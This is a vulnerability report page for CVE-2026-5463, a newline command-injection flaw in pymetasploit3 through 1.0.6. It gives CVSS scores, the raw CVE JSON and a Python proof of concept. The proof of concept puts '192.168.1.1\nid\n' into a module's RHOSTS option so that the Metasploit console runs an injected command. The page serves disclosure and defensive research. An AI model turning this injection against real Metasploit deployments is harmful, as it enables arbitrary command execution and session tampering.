Security Vulnerability Report
CVE-2026-5463 CVSS 8.6 HIGH

CVE-2026-5463

Published: 2026-04-03 05:16:24
Last Modified: 2026-04-03 16:10:24
Source: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

Description

Command injection vulnerability in console.run_module_with_output() in pymetasploit3 through version 1.0.6 allows attackers to inject newline characters into module options such as RHOSTS. This breaks the intended command structure and causes the Metasploit console to execute additional unintended commands, potentially leading to arbitrary command execution and manipulation of Metasploit sessions.

CVSS Details

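CVSS Score (v3.1)
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
Note: the values above are the CVSS v3.1 assessment. The raw record below also carries a CVSS v4.0 base score of 9.3 (CRITICAL) and a CVSS v2.0 base score of 7.5 (HIGH), all from the same source.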

Configurations (Affected Products)

No structured configuration data available.

Affected versions per the description: pymetasploit3 <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-5463
# Demonstrates the option-handling flaw by placing newline characters inside
# the RHOSTS option value of a module.
#
# Defensive reading of this listing:
#   * The advisory describes option values being turned into console command
#     text, so a line break in a value ends the intended command and starts
#     another one. Code that builds option values from untrusted input should
#     reject or strip CR/LF characters before assigning them.
#   * The advisory lists pymetasploit3 through version 1.0.6 as affected.
#   * This script authenticates to the RPC service itself. The exposure
#     presumably matters most where an application forwards untrusted input
#     into module options (confirm against your own integration).
import pymetasploit3 as msf


def main():
    """Run the demonstration against a local Metasploit RPC service.

    Prints progress messages and returns None. If the connection or the
    module lookup raises, the error is printed and the function returns early.
    """
    # The RPC service must already be running; these are the listing's
    # placeholder credentials and loopback endpoint.
    rpc_endpoint = {"port": 55553, "server": '127.0.0.1'}
    try:
        rpc = msf.MsfRpcClient('your_password', **rpc_endpoint)
    except Exception as e:
        print(f"Connection failed: {e}")
        return

    # Any module would do here: the point of interest is how option values
    # are handled, not what the module does.
    try:
        scanner = rpc.modules.use('auxiliary', 'scanner/portscan/tcp')
    except Exception as e:
        print(f"Module loading failed: {e}")
        return

    # Option value containing embedded newlines. Per the original listing,
    # the text after the first line break ('id') is treated by the console
    # as a command of its own rather than as part of RHOSTS.
    malicious_rhosts = "192.168.1.1\nid\n"
    print(f"[*] Injecting payload into RHOSTS: {repr(malicious_rhosts)}")
    scanner['RHOSTS'] = malicious_rhosts

    # The original listing states that console.run_module_with_output()
    # processes the value at this point; that call is not visible in this
    # script. NOTE(review): confirm the code path against the library source.
    print("[*] Executing module to trigger command injection...")
    scanner.execute()
    print("[+] Exploit attempt finished. Check the Metasploit console for 'id' output.")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5463", "sourceIdentifier": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "published": "2026-04-03T05:16:24.160", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerability in console.run_module_with_output() in pymetasploit3 through version 1.0.6 allows attackers to inject newline characters into module options such as RHOSTS. This breaks the intended command structure and causes the Metasploit console to execute additional unintended commands, potentially leading to arbitrary command execution and manipulation of Metasploit sessions."}], "metrics": {"cvssMetricV40": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}], "cvssMetricV2": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/DanMcInerney/pymetasploit3", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}, {"url": "https://pypi.org/project/pymetasploit3/", "source": "309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c"}]}}